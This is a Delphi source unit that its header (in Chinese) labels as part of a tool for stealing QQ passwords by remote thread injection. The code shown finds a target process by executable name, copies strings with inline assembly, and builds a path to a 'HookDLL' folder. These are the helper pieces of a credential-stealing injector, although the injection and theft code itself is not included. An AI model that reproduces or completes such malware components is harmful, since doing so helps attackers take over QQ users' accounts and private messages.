funit.pas

远程线程注入获取QQ密码远程线程注入获取QQ密码

unit  funit;

interface

function FindProcess(ExeName: string): Longword;            //查找进程
function StrCopy(Dest: PChar; const Source: PChar): PChar;  //拷贝字符串
function GetDLLDirectory(FullPath: string): string;         //取DLL路径

implementation

uses Windows;

type
  TProcessEntry32 = packed record
    dwSize: DWORD;
    cntUsage: DWORD;
    th32ProcessID: DWORD;       // this process
    th32DefaultHeapID: DWORD;
    th32ModuleID: DWORD;        // associated exe
    cntThreads: DWORD;
    th32ParentProcessID: DWORD; // this process's parent process
    pcPriClassBase: Longint;    // Base priority of process's threads
    dwFlags: DWORD;
    szExeFile: array[0..MAX_PATH - 1] of Char;// Path
  end;
   //---------API----------//
function CreateToolhelp32Snapshot(dwFlags, th32ProcessID: DWORD): THandle stdcall; external 'kernel32.dll';
function Process32First(hSnapshot: THandle; var lppe: TProcessEntry32): BOOL stdcall; external 'kernel32.dll';
function Process32Next(hSnapshot: THandle; var lppe: TProcessEntry32): BOOL stdcall; external 'kernel32.dll';
   //---------API----------//   

     //寻找指定进程,返回其ID.
function FindProcess(ExeName: string): Longword;
       //(子函数)尾串是否匹配,不分大小写
  function AnsiEndsText(const ASubText, AText: string): Boolean;
  var
    P: PChar;
    L, L2: Integer;
  begin
    P := PChar(AText);
    L := Length(ASubText);
    L2 := Length(AText);
    Inc(P, L2 - L);
    if L > L2 then
      Result := False
    else
      Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE,P, L, PChar(ASubText), L) = 2;
  end;
var
  sphandle: DWORD;  Found: Bool;
  PStruct: TProcessEntry32;     
begin                                      	
  Result := 0;
  sphandle := CreateToolhelp32Snapshot($00000002, 0);
  PStruct.dwSize := Sizeof(PStruct);
  Found := Process32First(sphandle, PStruct);
  while Found do
  begin
    if AnsiEndsText(ExeName, PStruct.szExefile) then
    begin
       Result := PStruct.th32ProcessID;   Break;
    end;
    Found := Process32Next(sphandle, PStruct);
  end;
  CloseHandle(sphandle);
end;

     //PChar字符串复制
function StrCopy(Dest: PChar; const Source: PChar): PChar;
asm
        PUSH    EDI
        PUSH    ESI
        MOV     ESI,EAX
        MOV     EDI,EDX
        MOV     ECX,0FFFFFFFFH
        XOR     AL,AL
        REPNE   SCASB
        NOT     ECX
        MOV     EDI,ESI
        MOV     ESI,EDX
        MOV     EDX,ECX
        MOV     EAX,EDI
        SHR     ECX,2
        REP     MOVSD
        MOV     ECX,EDX
        AND     ECX,3
        REP     MOVSB
        POP     ESI
        POP     EDI
end;

     //取得DLL所在目录
function GetDLLDirectory(FullPath: string): string;
var
  i: integer;
begin
  i := length(FullPath);
  while i>=1 do
  begin
    if (FullPath[i]='\') then  break;
    dec(i);
  end;
  Result := copy(FullPath,1,i-9)+'HookDLL\';
end;

end.